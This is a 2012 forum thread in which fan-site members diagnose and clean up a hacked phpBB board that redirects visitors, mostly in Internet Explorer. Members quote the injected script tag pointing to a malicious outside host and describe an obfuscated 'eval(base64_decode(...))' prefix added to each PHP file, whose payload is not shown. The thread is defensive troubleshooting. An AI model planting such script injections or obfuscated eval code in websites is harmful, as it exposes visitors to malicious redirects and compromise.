EnglishFrenchJapaneseKorean
Powered by Translate
Stay in the Loop: (newsletter signup form)

Forum hacked?

Post problems and requests to the UY Dojo here. Requests include something you'd like to appear on the UY Dojo: Story synopses, Character descriptions, etc.

Moderators: Steve Hubbell, Mayhem, Moderators

Postby Mayhem » Thu Mar 01, 2012 14:43 +0000

Pinging up the index.php source in IE8 (yes, it tried to redirect when I used that browser) reveals this at the bottom of the code:

<script src="http://sbulle06tsconti.rr.nu/nl.php?p=d"></script>

Googling that URL pulls up just one hit online for a compromise at Dreamhost:

http://community.mybb.com/thread-114345.html

Which then leads to this thread:

http://discussion.dreamhost.com/thread-134262.html

Is the Usagi Dojo on Dreamhost? If so, it might explain something. The HTACCESS file might need looking at as well.
With a breeze comes a storm, but then you'll all be washed away...
User avatar
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England

Postby Stormhaven » Thu Mar 01, 2012 15:35 +0000

I ran into something similar a while back on a domain I was running, I'm guessing the PHPBB that the dojoboard is running is probably a few revs behind. There have been quite a few security exploits with the older versions. I had to have the host provider run a grep to find all the files with the domain inserts and manually repair them.
Stormhaven
Shugyosha<Student Warrior>
 
Posts: 34
Joined: Sun Mar 09, 2003 2:51 +0000

Postby Todd Shogun » Thu Mar 01, 2012 15:44 +0000

I use Firefox and no problems....I will see what i can do!

And yes, Dreamhost does host us
Image
Order your UYD Albedo NR 2 T-Shirt today! Only $12!

Image
User avatar
Todd Shogun
Shogun
 
Posts: 1908
Joined: Fri Sep 20, 2002 12:43 +0000
Location: Orange Co., California

Postby Todd Shogun » Thu Mar 01, 2012 16:23 +0000

Ugh...it looks messy. This will be time-consuming. Any phpBB-savvy Members out there willing to help?
Image
Order your UYD Albedo NR 2 T-Shirt today! Only $12!

Image
User avatar
Todd Shogun
Shogun
 
Posts: 1908
Joined: Fri Sep 20, 2002 12:43 +0000
Location: Orange Co., California

Postby maichan » Thu Mar 01, 2012 22:11 +0000

Wow, sounds serious. Hope you can get it fixed Todd!

@Stormhaven - on your advice I'm on Firefox now without any problems.
My home computer info:
Internet Explorer 9.0.8112.16421 - redirects
Firefox 10.0.2 - Does not redirect
Michael, a.k.a., Maichan

My Usagi Collection
User avatar
maichan
Hatamoto<Special Retainer>
 
Posts: 1914
Joined: Fri Jul 22, 2011 23:04 +0000
Location: A little Minka, somewhere in the countryside...

Postby Stan Sakai » Fri Mar 02, 2012 7:57 +0000

I heard from Thomas. He has tried getting to the Dojo, but was redirected every time. I gave him the tip about using Firefox. Hopefully, that will work for him.

I've been redirected a couple of times, but not to the extent that others on this board have experienced. I use a Mac computer and Safari.
User avatar
Stan Sakai
Sensei
 
Posts: 4765
Joined: Wed Sep 18, 2002 12:21 +0000

Postby Mayhem » Fri Mar 02, 2012 8:16 +0000

It does appear to be only IE, and perhaps Safari, affected. My brother and I tried different versions of IE and Firefox, and no Firefox version got redirected. All the IE browsers did.
With a breeze comes a storm, but then you'll all be washed away...
User avatar
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England

Postby Stormhaven » Fri Mar 02, 2012 8:43 +0000

Todd, I don't know PHP but when I had to deal with this, I just manually removed the bits from the HTML. If you just need help doing that, feel free to contact me.
Stormhaven
Shugyosha<Student Warrior>
 
Posts: 34
Joined: Sun Mar 09, 2003 2:51 +0000

Postby digulla » Sun Mar 04, 2012 14:19 +0000

I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.

Edit The virus did two changes:

1. There was a file .log/log1.txt which contains the list of sites to redirect to.

2. At the start of each .php file, there was code like this: <?php /**/ eval(base64_decode("...."))

I'm not sure what this code did, my guess is that it kept the file above up to date plus it probably injected the code for the redirection into the HTML.

I kept the files just in case we want to analyze this further.
Last edited by digulla on Sun Mar 04, 2012 14:32 +0000, edited 1 time in total.
Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
User avatar
digulla
Daimyo <High-Ranking Lord>
 
Posts: 285
Joined: Mon Aug 12, 2002 13:01 +0000
Location: Zurich, Switzerland

Postby Mayhem » Sun Mar 04, 2012 14:23 +0000

Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.
With a breeze comes a storm, but then you'll all be washed away...
User avatar
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England

Postby digulla » Sun Mar 04, 2012 14:29 +0000

Mayhem wrote:Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.


Yes. I just never had the time to make the update.
Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
User avatar
digulla
Daimyo <High-Ranking Lord>
 
Posts: 285
Joined: Mon Aug 12, 2002 13:01 +0000
Location: Zurich, Switzerland

Postby digulla » Sun Mar 04, 2012 14:39 +0000

Aaron Digulla a.k.a. Philmann Dark
"It's not the universe that's limited, it's our imagination.
Follow me and I'll show you something beyond the limits."
http://www.philmann-dark.de/
User avatar
digulla
Daimyo <High-Ranking Lord>
 
Posts: 285
Joined: Mon Aug 12, 2002 13:01 +0000
Location: Zurich, Switzerland

Postby toine » Tue Mar 06, 2012 17:27 +0000

digulla wrote:I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.


I just have been redirected... :?

(chrome under ubuntu 11.10)
***************************************

"The future is unwritten, know your rights"

The Clash

***************************************
User avatar
toine
Shugyosha<Student Warrior>
 
Posts: 30
Joined: Tue Apr 05, 2005 9:16 +0000
Location: Peterborough ON

Me,too....

Postby go » Tue Mar 06, 2012 17:33 +0000

Dear Readers,
I just got redirected using Firefox.
Best wishes to all!
go
User avatar
go
Shinobi<Special Ninja Agent>
 
Posts: 1522
Joined: Wed Sep 18, 2002 17:19 +0000

Postby Mayhem » Tue Mar 06, 2012 21:35 +0000

Hmmm, somewhat worrying, but no redirect here for me.
With a breeze comes a storm, but then you'll all be washed away...
User avatar
Mayhem
Daimyo <High-Ranking Lord>
 
Posts: 2782
Joined: Wed Sep 18, 2002 3:54 +0000
Location: London, England

PreviousNext

Return to Usagi Yojimbo Dojo Help

Who is online

Users browsing this forum: No registered users and 1 guest